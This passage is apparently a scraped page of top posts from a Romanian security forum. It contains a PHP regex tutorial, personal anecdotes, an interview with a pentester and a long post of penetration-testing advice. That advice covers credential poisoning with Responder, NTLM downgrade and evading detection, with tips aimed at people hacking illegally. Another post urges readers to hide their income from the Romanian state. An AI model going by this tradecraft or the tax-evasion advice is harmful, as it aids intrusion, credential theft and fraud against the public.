'@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}/?).*@i', 'http://sub.subdomeniu.g3x0.com/hireme/', $rezultat ); #5. Rezultat: Array ( [0] => http://sub.subdomeniu.g3x0.com/hireme/ [1] => http://sub.subdomeniu.g3x0.com/ ) 6. Elemente avansate pentru grupari 6.1. Elementul "?:" Acest element poate fi folosit pentru a fi ignorate anumite grupuri din rezultate. Exemplul urmator: preg_match( '/(\d{1,2})(\w+)(\d{4})/', '27decembrie2013', $rezultat ); Returneaza: Array ( [0] => 27decembrie2013 [1] => 27 [2] => decembrie [3] => 2013 ) Dar daca nu avem nevoie zi, putem aplica "?:" la inceputul grupului si nu mai apare printre rezultate: preg_match( '/(?:\d{1,2})(\w+)(\d{4})/', '27decembrie2013', $rezultat ); Returneaza: Array ( [0] => 27decembrie2013 [1] => decembrie [2] => 2013 ) Exemplul acesta nu este unul prea bun pentru a demonstra necesitatea unei astfel de instructiuni, pentru ca putem pur si simplu sa omitem prima grupare, astfel: preg_match( '/\d{1,2}(\w+)(\d{4})/', '27decembrie2013', $rezultat ); Iar rezultatul ar fi acelasi. Dar exista si situatii care necesita grupari peste tot, iar atunci veti sti ce sa folositi. 6.2. Elementul "?|" Uneori va trebui sa integrati grupuri in alte grupuri, iar pentru asta va trebui sa folositi "(?|". Exemplul urmator arata o incercare clasica de a folosi operatorul "|" intr-un grup: preg_match( '/(?a|b|c)z/', 'az', $rezultat ); Desi acesta pare in regula, nu este. Acest exemplu va returna o eroare asemanatoare cu: Warning: preg_match() [function.preg-match]: Compilation failed: unrecognized character after (? or (?- at offset 2 on line 1 Iata un exemplu bun care face ceea ce ne dorim: preg_match( '/(?|a|b|c)z/', 'az', $rezultat ); A se observa operatorul "|" in plus, imediat dupa "?". Exista si o parte ciudata aici, totusi. Daca ne uitam la ce returneaza in "$rezultat", vom observa ca nu avem un index separat pentru ce este in "(?|)". Array ( [0] => az ) Pentru a se obliga afisarea un rezultat, va trebui sa grupam elementele invidual in "(?|)": preg_match( '/(?|(a)|(|(c))z/', 'az', $rezultat ); Acum va returna: Array ( [0] => az [1] => a ) De asemenea, nu este necesar ca absolut toate elementele sa fie grupate individual pentru a afisa acel idnex in plus. De fapt, putem sa omitem unele si sa obtinem rezultate interesante, depinde de situatie. Iata cateva exemple: #1. Exemplu: preg_match( '/(?|a|(|(c))z/', 'az', $rezultat ); #1. Rezultat: Array ( [0] => az ) #2. Exemplu: preg_match( '/(?|a|(|(c))z/', 'bz', $rezultat ); #2. Rezultat: Array ( [0] => bz [1] => b ) 6.3. Elementul "?>" (atomic grouping) Acest element este folosit pentru optimizarea unui pattern din punctul de vedere al spatiului de procesare. Considerati exemplul urmator: preg_match( '/\b(romanian|rotten|tomato)\b/', 'romanians', $rezultat ); Regex verifica toate cele trei combinatii pana se da batut. In schimb, cu "(?>": preg_match( '/\b(?>romanian|rotten|tomato)\b/', 'romanians', $rezultat ); Verifica primul "\b", e OK si trece mai departe, apoi verifica prima varianta din grupare si observa ca se potriveste "romanian", in schimb, se impotmoleste la final, la al doilea "\b", pentru ca in string, dupa "romanian", urmeaza "s", nu un non-cuvant ("\d"). Pana aici a facut ce ar face si prima varianta, doar ca spre deosebire de prima varianta, urmatoarele variante nu mai sunt incercate. Aceasta optiune este utila si de nadejde atunci cand variantele sunt foarte diferite una de alta, pentru ca daca ar fi asemanatoare, ar putea sari chiar peste cea buna. De exemplu: preg_match( '/\b(?>romanian|rotten|tomato|romanians)\b/', 'romanians', $rezultat ); Va returna false pentru ca se impotmoleste la primul "\bromanian\b" si renunta la restul gruparii. 6.4. Lookaround 6.4.1. Elementele "?=" si "?!" (positive & negative lookahead) Aceste elemente se folosesc pentru a testa daca dupa charsetul care preceda "(?=)" sau "(?!)" urmeaza cel din aceste grupari. "x(?=y)" returneaza "x" daca este precedat de "y" "x(?!y)" returneaza "x" daca nu este precedat de "y" Exemplu: preg_match( '/rst(?=forums)/', 'rstforums', $rezultat ); Va returna: Array ( [0] => rst ) Iar: preg_match( '/rst(?!forums)/', 'rstforums', $rezultat ); Va returna: Array ( ) Ideea principala de retinut aici este ca nimic dintre "()" nu va fi returnat in output, indiferent de situatie. Ce este acolo exista doar pentru a fi comparat. 6.4.2. Elementele "?<=" si "?<!" (positive & negative lookbehind) Acest element sunt identice cu cele discutate anterior, doar ca vor cauta in stanga charset-ului dat inaintea "()" in loc de dreapta. "(?<=x)y" returneaza "y" daca este succedat de "x" "(?<!x)y" returneaza "y" daca nu este succedat de "x" Exemplu: preg_match( '/(?<=viziteaza )RST/', 'viziteaza RST', $rezultat ); Va returna: Array ( [0] => RST ) Iar: preg_match( '/(?<!viziteaza )RST/', 'viziteaza RST', $rezultat ); Va returna: Array ( ) 7. Referinte pentru grupuri de text din acelasti pattern Am discutat la punctul 5 ca putem folosi rezultatele din regex-uri ce folosesc "()" in replace prin "$1", "$2" etc, dar puteti folosi aceste grupari chiar si in acelasi pattern. Daca aveti o sursa HTML si vrei sa selectati continutul urmatorului tag: $string = '<header id="top-header" class="wrapper" style="clear: both">Continutul care ne intereseaza.</header>'; In loc sa procedam in felul urmator: preg_match( '@<header[^>]*>([^<]+)</header>@', $string, $rezultat ); Am putea astfel: preg_match( '@<(header)[^>]*>([^<]+)</\1>@', $string, $rezultat ); Aceste doua linii sunt echivalente si returneaza acelasi rezultat. A se observa acel "\1" aproape de final. "\1" va fi inlocuit cu continutul din primul grup "()" la momentul executiei. Se poate proceda astfel pana la \99. Desigur ca exemplul dat de mine nu face prea mult sens, dar in functie de cat de lungi aveti pattern-urile voi, se va putea dovedi folositoare aceasta componeneta. 8. Conditii Da, regex suporta conditii. Vreau sa mergeti sa va udati pe fata cu niste apa ca tot ce ati vazut pana acum a fost partea usoara. Sintaxa generala este: "(?(conditie)true|false)", dar se va complica imediat. Sa presupunem urmatorul sir: 'abc' Backstory-ul este ca daca "a" este prima litera, dupa ea urmeaza "b", daca nu, urmeaza "c". preg_match( '/(a)?(?(1)b|c)/', 'abc', $rezultat ); Rezultatul este: Array ( [0] => ab [1] => a ) Iar pentru: preg_match( '/(a)?(?(1)b|c)/', 'bca', $rezultat ); Rezultatul este: Array ( [0] => c ) Conditia intotdeauna este true daca "()" cu numarul dat este indeplinita. In cazul nostru, conditia este sa-l gaseasca pe "a" inaintea tuturor celorlalte litere. Inca un exemplu: Primit de la o aplicatie urmatoarele doua output-uri: 'female: she sucks' sau 'male: he fucks' Ca sa testam treburile astea doua folosindu-ne de conditii, vom proceda in felul urmator: preg_match( '/(fe)?male: (?(1)she|he) \w+/', 'female: she sucks', $rezultat ); Rezultat: Array ( [0] => female: she sucks [1] => fe ) Iar pentru: preg_match( '/(fe)?male: (?(1)she|he) \w+/', 'male: he fucks', $rezultat ); Rezultat: Array ( [0] => male: he fucks ) Practic, daca este gasit "fe" din "female", se indeplineste conditia, pentru ca "$1" va contine "fe", in cazul asta, in continuare, dupa "male: ", va urma "she", si apoi " \w+". --- Cam atat. Probabil voi mai adauga niste puncte pe parcurs. Sper sa va fie de ajutor. Daca vreti sa cititi mai multe: www.regular-expressions.info
  5. 14 points
    Nu trebuie sa fii niciun rezident intr-un paradis fiscal. Folosesti doar servicii din afara tarii pentru plati (cont bancar, firma si toate cele), astfel incat in tara pulei sa nu figurati cu niciun venit. Nu declarati absolut niciun venit la statul roman ticalosit. Nu vi se ofera nimic pe banii aia. - Nu deschideti firme in romania. Veti deveni prostituate iar statul pestele vostru. 80% din bani merg la stat. - Nu va faceti conturi bancare si carduri in Romania. In orice moment va puteti trezi cu conturile blocate sau verificati de ticalosi. - Daca va intreaba vreo curva de functionara cu ce traiti, spuneti ca futeti babe contra mancare si bautura si ca puteti oferi discount in cazul in care e interesata. Da-i in pula mea, nu e treaba lor.
  6. 14 points
    Administrez servere linux (orice distributie) cat si FreeBSD. Experienta in domeniu: 20 de ani In mare, din cunostintele ce le am: - Politici de securitate atat pe FreeBSD cat si pe linux - Solutii antispam si solutii de securitate pentru servere de email - Orice arhitectura de server(e) web (content delivery & caching, dual strat, clusters) - MySQL, PostgreSQL, PHP - Tehnici avansate de mitigare atacuri DDoS. - Sisteme de detectie si prevenire a intruziunilor Instalez, configurez si optimizez orice fel de daemon sau aplicatie open source. De asemenea, ofer consultanta pentru necesitati hardware. Pentru cotatii de pret, trimite un email te rog la tex at unixteacher dot org (sau un mesaj privat)
  7. 13 points
  8. 12 points
  9. 11 points
    Atunci cand foamea invinge orgoliul ....
  10. 11 points
    Pe redhat majoritatea subdomeniilor daca nu erai logat si intrai pe o pagina unde necesita logarea redirect ul se facea prin service-now care avea un parametru prin GET vulnerabil. Nu am mai gasit poza exacta, am facut o poza dupa video ul de poc. La sap.com la.fel era un XSS prin GET, postez poza diseară cand ajung. Ambele raportate, rezolvate si ca recompensa am luat hof pe ambele. La redhat m au pus sa aleg in care vreau la service now sau redhat😂
  11. 10 points
  12. 10 points
    Material Introduction Section 1) Fundamentals Section 2) Malware Techniques Section 3) RE Tools Section 4) Triage Analysis Section 5) Static Analysis Section 6) Dynamic Analysis Sursa: https://securedorg.github.io/RE101/
  13. 10 points
    Salut, Nu mai sunt atat de activ ca inainte pe forum dar incerc sa intru la 2-3 zile - insa primesc in continuare mesaje pe tema dropshippingului - ce tin sa va zic ca ca aceast domeniu nu este pentru oricine - ai nevoie de ceva capital ca sa mearga treburile rapid, de o platforma, plugins etc - depinde ce folosesti - dar mai ales de cadru legal. Odata ce faci mai multi banuti incep sa apara probleme, paypal iti limiteaza contul, stripe cere dovezi si tot asa, plus taxe de platit etc. Observ ca multi nu se descurca, altii renunta cand aud de cadru legal si asa mai departe insa toata lumea vrea sa faca bani si nu inteleg de ce lumea nu merge pe "old fashion way" blog sau aflieri cu amazon sau ceva de genu pentru ca merge, eu vad asta in fiecare zi, mai exact, o simt la buzunar.. La un moment dat am renuntat la aflieri si adsense si amazon si media.net dar am reluat de cateva luni si merge chiar foarte bine a-si putea spune. Nustiu daca frecventati Flippa insa eu o fac zilnic si gasesc acolo diferite chilipiruri in materie de NISE, am si vandut cateva site-uri, am mai cumparat unele insa pentru mine acest website e ca un fel de cutia pandorei. Acum ceva timp s-a vandut un site cu 4000 de dolari daca nu ma insel, era o pagina statica, alba complet cu un articol de 700 de cuvinte... a fost mind fuck, am verificat site-ul, avea 26 de backlinkuri, pareau naturale...cele mai multe de la directoare web. Competitie 4-5 siteuri...poate.. Next Step pentru mine, am cumparat un domeniu si hosting (19$ pe an pentru amundoua de la NameCheap) am incarcat o tema, am contactat o firma care imi scrie articole (7.50$ / 500 cuvinte) si am comandat 5 articole, unul de 2000, si restul de 500. Am luat un pachet seo de pe BHW unde am platit 130$. Investitia finala a fost undeva la 200 de dolari, plus minus. Asta am facut in prima saptamana, apoi NIMIC, l-am lasat sa doarma acolo. Cati bani face? Nu mult, in a 3-a luna e ok. Si asta e doar amazon, cu ce am mai facut din media.net ajung la 200 si asta e doar un site. Trafic doar din google - organic, fara social media fara nimic, nisa e cam "strange" si nustiu ce accounturi a-si putea face. Acum inmultiti cu 4 site-ui ca atatea am pe partea asta deocamdata... ------------------------------------------------- Short Story - Cu ce ajuta 1000223 topicuri cu 12232 de intrebari daca x lucru e mort, daca se mai poate daca etc.. totul merge, doar sa te tii. Mergi pe kwfinder cautati un cuvant / nisa usor de rankat si da drumu la treaba. Un prieten ma facea idiot aseara cand eu ii spuneam ca a face bani pe net e joaca de copii - poate e doar parerea mea - aici nu vorbesc de sute mii de doalri...ci de bani in general...e simplu, doar apuca-te de treaba si tine-te de ea. Daca renunti si la fumat 1 saptamana sau la scuipat seminte s-ar putea sa ai bani de domeniu si hosting sau orice altceva. Numai Bine.
  14. 10 points
    selfbashed. Am plecat seara din FR cu masina. Pe la ora 23, pe drum, am vazut o benzinarie mare la Colmar. Zic, hai ca opresc, ma mai alimentez cu o cafea si abandonez ceva nasol mirositor la toaleta. Zis si facut, opresc acolo, iau un espresso scurt, il sorb repede si merg la toaleta. Abandonez eu treaba acolo si trag apa. Vad ca era deja infundat wc-ul si incepea sa creasca mult nivelul "marii". Mi-am dat seama ca e defect si ala de apa.... a tot curs acolo, ma gandeam ca nu se mai opreste in ma-sa.... Ala plutea deasupra, a dat peste wc, au cazut jos doua bucati de stiuca ce pluteau pe deasupra apei involburate si a intrat pe sub cabina in cabina cealalalta, plutind asa in deriva in mortii lui. Mi-au dat lacrimile de ras si nu stiam cum sa fug mai repede de acolo. Radeam odata de intamplare si odata cu gandul ca in cabina cealalalta ar fi putut fi un francez nenorocit! :))))))
  15. 10 points
    Abonament de tren in Romania ? Care e faza, vrei sa ajungi peste doua zile la munca ?
  16. 10 points
    Know your community – Ionut Popescu January 16, 2017 SecuriTeam Secure Disclosure Maor Schwartz When we sponsored DefCamp Romania back in November 2016, I saw Ionut Popescu lecture “Windows shellcodes: To be continued” and thought to myself “He’s must be a key figure in the Romanian security community – I must interview him” so I did! Introduction Ionut is working as a Senior Penetration Tester for SecureWorks Romania. Speaker at DefCon and DefCamp, writer of NetRipper, ShellcodeCompiler and a family man. Questions Q: What was your motivation to getting into the security field? A: First of all, the security field is challenging. It’s like a good movie whose main character has to do some tricky moves to find the truth – In the security field it’s he same. Second, it’s fun. Get access to different systems or to exploit applications. Your friends will think you did something really complicated when you actually exploited a simple vulnerability. My motivations were never (and will never be) fame or money, it’s the challenge and learning. Q: When did you get into the security field? A: I got my first computer when I was 16. I used it to play games until I found a small Romanian security forum. I saw that there was a lot of challenging stuff you could do and I became interested in the security field. During this process I learned Visual Basic 6 / HTML / CSS / JS / PHP / MySQL and practiced my web application vulnerability research skills. After some time I became interested in more complicated stuff such as C/C++ and ASM. It’s was step by step learning where the more you know, the more you realize you don’t know. Q: Since you started, you have found vulnerabilities (vBulletin for example), wrote exploitations tools like NetRipper and ShellcodeCompiler. Why did you decide to specialize in offensive security? A: Offensive security is the fun part of security. From my point of view, it is more complicated, more fun and more challenging than defensive security. Let’s take the vBulletin example. I managed a vBulletin installation and I wanted to make sure the forum was secure. I always updated with the latest vBulletin patches, our server was up to date and it even had a few hardening configurations – this is defensive security. But when I decided to take a look on my own at vBulletin, I found an SQL Injection. Guess what made me happier – installing patches and keeping a system up to date or the discovery of an SQL Injection? Since I was young, I was more attracted by the offensive part of security. Q: Why did you develop NetRipper and ShellcodeCompiler? A: A long time ago I discovered that by using API hooking (intercepting Windows function calls) you can do a lot of stuff. While working on an internal penetration test on a limited system, I had the idea that I could capture the traffic made by administration tools in order to pivot to other systems. The idea was not new, but the available tools did not offer what I wanted – a post-exploitation tool to help penetration testers on their engagements. So, I started working on NetRipper, which was released at Defcon 23. Recently, being interested in low-level stuff such as ASM and Windows Internals, I wanted to write my own shellcodes. I did it easily on Linux, but it was a little bit more complicated on Windows. I noticed that you will repeat a lot of the content from one shellcode to another, so I decided to automate this. This idea was also not new. I saw a basic shellcode compiler, but its users had to write ASM code. I wanted a fast and easy way to write one. This is how Shellcode Compiler was born. Q: What is the most innovative project you did as offensive security researcher? A: I think the most innovative project I did as a security researcher is Shellcode Compiler. Even if the idea is not new and the tool is really limited, it turns a difficult job into a really easy one, and anyone can write a shellcode. However, I still need to implement a few features that will make it more useful. I don’t have a lot of free time to work on this project, but I always try to make some time for it. Q: Where did you learn to be an offensive security researcher? A: I started to learn from security forums. I still remember hacky0u forums. Now I get most of my technical stuff from Twitter. My tweets are actually a “to read” list. I like to see that a lot of technical people share their knowledge. I read anything that’s new from blogs, whitepapers and security conferences. I find Twitter is the central place where I can find all this information by following the right people. Q: How big is the security community in Romania? A: The security community in Romania is medium-sized. There are really good security guys in Romania, but many of them don’t have the necessary time to share their knowledge. There are security researchers from Romania that spoke at well-known security conferences, write tools and whitepapers, but not as much as I would like to. In my opinion, it doesn’t matter from where is the researcher – we live in international world, especially the security researchers community. Q: I saw that you are one of the Admins in the Romanian security forums called RST Forums. Why did you open the forum? What was the goal? How helps you to manage it? A: RST Forums is the largest Romanian security community. It is a well-known forum in Romania and most of the content is Romanian. I did not open this forum; a few other guys did it in 2006. However, they decided to leave the community, and so I am just continuing it. The goal is to help young and newbie Romanian learn security. I have friends that visited the forums for game cheats or programming help, eventually they got in to the security field and now they are working as penetration testers for large companies – the forum helped a lot of us in our careers, and that’s why it is still open. I hope many other young Romanians will use it as a way to start their careers in the field of information security. Q: How do you support the security research community today? A: I don’t do as much for the security research community as I would like. The two tools I released, NetRipper and ShellcodeCompiler, were to support the research community. I have written different technical articles and whitepapers and spoken at security conferences. Oh, and I also tweet useful technical stuff. It is not much, but it is something, and I hope someone will find my work useful. Q: Do you have a tool you are working on today? Do you know when you are going to release it? A: Right now, I would like to work on my current projects. I don’t have a new idea for a tool and it is not a good idea to work on one until the other tools are not as fully-featured and stable as I would like them to be. It was a pleasure, Ionut, to talk to you and get so much information on the local Romanian community You’re welcome. Link: https://blogs.securiteam.com/index.php/archives/2916
  17. 9 points
    O aplicaţie realizată de IT-iștii din Cluj, folosită de către NASA pe Staţia Spaţială Internaţională Mai mulţi IT-işti clujeni, dezvoltatori ai unei aplicaţii de back-up, au ajuns cu produsul lor chiar pe Staţia Spaţială Internaţională, după ce americanii de la NASA au cumpărat 20 de licenţe ale soft-ului lor, aflat în prezent deja la a şasea versiune, cu vânzări pe întreg mapamondul, scrie News.ro. NASA a achiziţionat 20 de licenţe ale soft-ului Backup4all, o aplicaţie dezvoltată de o echipă de programatori clujeni care deţin compania Softland. Începând cu luna mai, aplicaţia este folosită pe Staţia Spaţială Internaţională pentru activităţile de backup realizate de către agenţie. O licenţă pentru această aplicaţie costă 49,99 dolari, dar pentru că NASA a cumpărat o cantitate mai mare de licenţă, a primit şi o reducere, astfel încât preţul total a fost de 770 de dolari. De asemenea, pentru că este folosită într-un mediu în care nu există conexiune la internet, aplicaţia a trebuit modificată. "În ianuarie anul acesta am primit un mail de la NASA în care ne spuneau că şi-ar dori să instaleze Backup4all într-un mediu foarte securizat, fără acces la internet. Ne-au explicat că modalitatea noastră de activare nu va funcţiona în environment-ul lor şi atunci am aflat că vor să instaleze aplicaţia pe Staţia Spaţială Internaţională. A urmat o lună întreagă de teste şi configuraţii pentru ceea ce aveau nevoie şi în 31 mai a început să fie utilizată. Astfel, acum rulează pe opt laptopuri de pe Staţia Spaţială Internaţională”, a explicat Lóránt Barla, din partea companiei Softland. Clujenii, care au ajuns cu Backup4all la a şasea versiune, au explicat că mai ţin legătura cu cei de la NASA, în cazul în care aceştia au nevoie de ajutor pe partea de suport. "Cei de la NASA au cumpărat aplicaţia de pe site-ul nostru ca orice client normal. Nici măcar nu am ştiut. Poate mai avem şi alţi clienţi la fel de importanţi, dar nu ştim. Ar fi avut şi alte opţiuni pentru că este destul de mare concurenţa pe partea de backup. De ce au ales aplicaţia noastră? Pentru că li s-a părut că este cea mai bună soluţie pe care o pot configura conform nevoilor lor. În ceea ce îi priveşte pe clienţii noştri de la NASA, mai comunicăm profesional cu ei şi dacă vor avea nevoie de suport, pot conta pe ajutorul nostru. Dar, de regulă, Backup4all se configurează şi îşi face back-up automat fără să fie nevoie de altă interacţiune cu dezvoltatorii”, a precizat Lóránt Barla. Ca firmă, Softland funcţionează din 1999, la început desfăşurând activităţi de outsourcing. Din 2002 însă, echipa s-a concentrat să dezvolte şi să vândă propriile programe. În prezent, Softland are 13 angajaţi care se ocupă inclusiv de marketing, relaţia cu clienţii şi vânzări. Sursa: http://www.digi24.ro/stiri/externe/o-aplicatie-realizata-de-it-istii-din-cluj-folosita-de-catre-nasa-pe-statia-spatiala-internationala-737922
  18. 9 points
  19. 9 points
    Vreau eu un kernel 0day pentru ultima versiune de Windows. Sau acces la baza de date Apple. (for fappening purposes maybe)
  20. 9 points
    May he rest in peace! Normal, că toți puțoii cu cont făcut peste noapte habar n-au de istoria forumului și nu cunosc vechii membri. A fost om cu multe skill-uri.
  21. 8 points
  22. 8 points
    Hello everyone. I joined this community a while ago; I have/had been a lurker for even longer. A huge part of what made the hacker community what it was (and what it is here) involves a willingness to share knowledge (without spoonfeeding). I would feel remiss if I gained so much from so many of you and did not give something back on occasion. What follows are anecdotes, opinions and observations I can share after almost 7 years working professionally in the InfoSec/Netsec field. Most of my work in this sphere has been anchored in Penetration Testing. Even when my official designation was Network Security Analyst, I spent most of those 3 years in engagements against PCI environments utilized for subcontracting work from Comcast, Verizon, Time Warner, Sprint and AT&T (to name a few of my former employers clients). Currently, I manage the Cybersecurity Lab of an International company that employees over 200,000 employees. Most of my work in my current position involves Penetration Testing (every type imaginable, including focused blackbox testing against embedded devices and the network/control structures surrounding them). I am also a lead point of contact for our international teams during remediation and triage of major security threats, incidents and breaches. For example, I was the my company’s head analyst for the recent Shamoon 2.0 attacks (W32.DisttrackB/W97M.Downloader) last February, as well as the recent Wannacry outbreak. I also serve in a Security Engineer capacity, as I am regularly asked to evaluate facets of our products and provide feedback and opinions on the security ramifications involved. I am extremely busy and wanted to give back what I have taken thus far, so this is going to be long... Here goes nothing: 1) I am completely self taught (meaning I acquired no college/formal education to get where I am). That being said, a solid Computer Science degree is invaluable as a base (I would generally avoid Cybersecurity degrees and go for CS ), and even the degree itself will open doors into this business. Also, I work alongside high-level engineers (CS and Electrical Engineering PhDs); what they can do in a short period of time once they take an interest in InfoSec/NetSec is frightening. 2) That leads me to this: to be great in this industry ( or great for this industry), I believe that InfoSec/NetSec has to become a lifestyle,not just a job. I easily work 80+ hours a week (every week) between work, further study and skills building. And I love just about every minute of it. There is a huge need for InfoSec/NetSec professionals,which I feel is going to lead to a flood of low knowledge, low passion, low skill hiring. Anyone trying to get into this industry for the cash alone is going to have a rude awakening: there are probably lower pressure, lower work hour ways to earn the same money doing something that actually interests you.. Also, those of us really invested in these arts can pretty easily spot our own. 3) Learn to study, and learn to love the act of studying. Much of this job is continual study; eventually, when presented with an issue youare ignorant of, you will feel confident in knowing that you can find the answers you need. Break the issue into small, manageable pieces (goals really), and put the pieces together until you can view the whole answer. 4) Most of my success in this industry has been due to a willingness to work hard, persevere and never give up. Ever. Most of this job is the creative solving of problems that do not or may not have any easy answer (or any answer at all…yet). You have to build a no retreat, no surrender, obsessive need to conquer problems. 5) I specialize in network penetration, though I have become fairly well rounded. To me, network penetration is the art of acquiring advantages. During an engagement, I am always looking to acquire advantages. I study and train to better recognize and maximize the resources within an environment that allow me to gain those advantages. Gaining these advantages are more a product of knowledge and experience then an application of tools. 6) I am also looking to be efficient; the best penetration tests replicate real world attacks. In that vein, each action you take raises the probability that you will be detected. For hackers and freedom fighters engaged in illegal activity,you may want to consider the latter a bit. Once you make ingress and launch any manner of offensive action, you have escalated the legal ramifications of your trespass by multiple magnitudes. Also remember that the probability of you getting caught and prosecuted is never 0.00%: you have to be prepared, you have to be careful, you have to be patient and you have to prepare contingencies. 7) I use a measurement/assessment of risk vs. reward to make each action within the network as efficient as possible; by percentages,losing a queen to take a rook is generally a loser’s bet. The best way I’ve learned to temper a careful approach is with an old sales slogan (“ Always be closing the deal”, which I modified to “Always be advancing your position(s)”). 7) I try as much as possible to engage a target as a stalking, ambush predator: I move carefully and try to use the environment to hide myself as I seek to exploit the target/objectives lack of awareness. I work to remain patient and identify/quantify as many of the variables of the current environment/situation as possible. Sometimes the best decision you can make is to slow down or hold your current position for a bit; watching Tcpdump or Wireshark while thinking on a better move is still advancing your position. 8) To lower the probability of detection (whenever possible) I attempt to attack, enumerate or probe from an obfuscated position. Configuring your attack host/node for the highest probability of situational anonymity (using tunneling, proxies, encapsulation ,etc.) is infinitely useful in pentesting, hacking and/or general security/privacy. Mastering the manipulation of proxy, tunneling and encapsulation protocols (which involves a deep understanding of networking/TCP/UDP) almost lends you quasi-magical invisibility and teleportation powers when involved in network penetration. Obfuscation itself is one of 10,000 reasons why experience/knowledge in the disciplines of networking, OS and programming combined with security research are such huge advantages (and another reason why if you take up this path you may never stop learning). 9) Learn to use every tool you can, but more importantly, learn why the tool works. If you work in/at exploitation long enough, the principles governing the tools will help you exploit a box someday,regardless of whether you use that particular tool to get the wanted/needed result.. 9) Knowledge/experience over tool use is especially important today: regardless of what many sites say, you will not find many enterprise/corporate networks today (as a professional penetration tester at least) where there are gross configurations/deployments leading to an easy, out of the box (deploy tool== Meterpreter) exploitation. 10) When training for a fight, professional mixed martial artists put themselves in the worst possible positions so they react properly when the fight is underway. Eventually, training/practicing your exploitation/research techniques the same way will be a huge boon in engagements, POCs (or in the wild). I especially like to round difficulty up during research; it is difficult for someone else to minimize your findings if you have added (and circumvented) greater security measures than the norm (rather than having reduced them). 11) Most of my exploitation of networks in the last couple years have been a process of discovering network misconfigurations and weaknesses (especially in Windows firewall, Programs and Features, LGPO/GPO policies and/or IE/Internet Options within Window Domains/Networks) or information leaks that I locate online or through DNS enumeration that ultimately leads to my gaining access to a host. From there, remote exploitation (toward post exploitation/privilege escalation/pivoting) will often occur This is largely when knowledge of things such as Powershell (leveraged by itself or tools like Powersploit/CrackMapExec/PsExec/Empire) become invaluable (in Windows networks). I have actually been finding easier remote exploits when attacking Linux/Unix boxes in enterprise networks (finding Solaris with Apache Tomcat during enumeration still springs hope eternal in my human breast). Many (actually, maybe all) of these companies are/were new at deploying Unix/Linux boxes in their networks and were making some serious mistakes with deployment. 12) Enumeration is the most important part of an engagement to me. You should get used to enumeration without automated tools; I love Nmap, but many times it is not feasible to usewithin the customer’s network (network overhead issues, the chance of detection by IIDS, the chance of breaking PLCs or other embedded devices, etc.). In cases where you are on the customer’s network, tools like Wireshark, Tcpdump, knowledge of networking protocols/ports and banner grabbing are your friends. 13) For those engagements where you first need to gain access to the network, you definitely have more room for running some louder tools: I love Fierce (and DNS enumeration in general) as it often presents my way in. Google dorking is still also an incredible tool, as is Firefox with the right set of extensions (Hackbar, Tamperdata, Wappalyzer, BuiltWIth, Uppity, IP Address and DOmain Information, etc,.). Who loves Dirbuster in these cirumstances? This carbon/caffeine based lifeform right here. Whether you are pentesting, bughunting or hacking/freedom fighting, a paid Shodan subscription will($50) is worth every cent. The capacity to make exacting, accurate searches for greater than five pages has helped me in more engagements/bughunts than I can remember. 14) When I am explaining why a config/setting/LGPO /GPO (etc.) is a security risk to a client or my fellow employees, I like to explain that many of the advantages I look for in my environment are most often advantages that are needlessly provided to me. If it does not break key functionality or seriously impede efficiency/development time, than it is in their best interest to deny me as many advantages as possible, even when the advantages appear as if they are minutia. When dealing with a client or non-security fellow employees,you should work to create a relationship of mutual help and teamwork. I am not there to rub their noses in there crap; I am there to help improve their security so the company can prosper. This is partially a customer service gig where solutions (remediation/counter measures) are more beneficial to the customer than the exploitation itself. Whenever possible, I like to end the post-exploitation/penetration test conversation/meeting/presentation with the attitude that I am here to help fix these issues , how can WE best close these gaps? How can I help make your (or our) company safer, so that we can become more prosperous? 15) I personally despise Microsoft (and many proprietary products/companies) on many levels, but when it comes to work, I am platform agnostic. Whatever tool is needed to complete the mission is the tool I am going to employ. However, whenever possible without jeopardizing the mission, I am going to employ an Open Source/Unix/Linux-centric solution. I work hard to show my company the value in Open Source. The way to show that value isn’t to be the super Unix/Linux/GPL neckbeard who constantly bemoans proprietary software./platforms. The best way (for me), is to show how effective the strategy involving the Open Source tool is. Then, in my report, I explain the business hook of using Open Source (if the tool is free for commercial use). I am sensitive to companies taking Open Source tools and turning them into something proprietary. However, if I can make my company (which is both huge and almost universally recognized as ethical, which is rare) see the value in Open Source, I know they will eventually incorporate Open Source into the support packages for their products (which they have while keeping the tools ad the license in tact). This than spreads the value of Open Source to smallercompanies who see it being trusted by a much larger company. 16) I have tens of thousands of dollars worth of licenses atmy disposal. However, I will never use tools like Nexpose, Nessus, Canvas orMetasploit Pro unless the project, client, or a governing body specificallyrequire them. I believe these tools develop poor habits. Obviously, if a project such as evaluating an entire domain of IP/hosts for vulnerabilities is my task, I am going to use Nessus. However, (whenever a time/project permits, which they most often do) I am going to evaluate the findings (and search for other vulnerabilities) manually. 17) The ultimate goal should be reliance on nothing more than a Linux/Unix Terminal, some manner of network access and a programming language. One of my favorite exploitation tools is my Nexus 7 2013 flo tablet (running a modified version of Nethunter) and a Bluetooth folio keyboard ( I got the idea from n-o-d-e, https://www.youtube.com/watch?v=hqG8ivP0RkQ44) as the final product is a netbook that fits in a jacket pocket). I have exploited some seriously huge clients with thislittle rig (for ingress and a quick root shell, WPS on network/enterpriseprinters and knowledge PCL/PJL/Postscript are often your friend). I have also exploited other customers with a cheap UMX smartphone with 5 gigs of storage, 1 gb of memory and GNUroot Debian (Guest Wifi access from the parking lot or an onsite public restroom, human nature, and Responder.py analyze mode, followed by WPAD, LLMNR and NetBios poisoning with NTLMv1 and LM authorization downgradefor the win). 18) During (red team, onsite, etc.) engagements, even when the ultimate target of the engagement is located on a hardwired network with heavy segmentation/compartmentalization (such as the conduit/zone based layouts that are general best practice in Industrial sectors), it is always worthgaining a host/node with corporate WIFI access. One thing WIFI access provides is reach: an Administrator’s (or other privileged user’s) dedicated workstation may be out of reach, but his other devices (if in scope) may be connected to Corp. WIFI for reasons such as saving data on a plan. Also, WIFI allows me attacks of opportunity even when I am doing other things. Running Responder.py on a misconfigured network’s WIFI while I am elsewise engaged is gaining me advantages (maybe clear text creds, maybe hashes, maybe NTLMv1 and LM hashes) at little cost to my time or attention. When I employ this, I like to spoof the poisoning machines hostname/mac address to something familiar on the network. If you see a bunch of hosts named “Apple” during your recon, and all of those hosts are not online, spoof the hostname/MAC to match one of the Apple machines (this will not withstand close scrutiny, but will often suffice with a little work). It always helps to watch and take note on the norms of the network traffic and protocols. Try to match this as much as possible (this will likely help you avoid IDS/IPS, firewall rules, etc.) and whatever traffic would seriously stand out, try to tunnel or encapsulate with normal network traffic/protocols. 19) This leads to two other points: A) Be prepared for the majority of people within a company who do not care about, or will minimize security issues. Do not get frustrated; I find that showing the parties involved what they stand to lose as a company from a 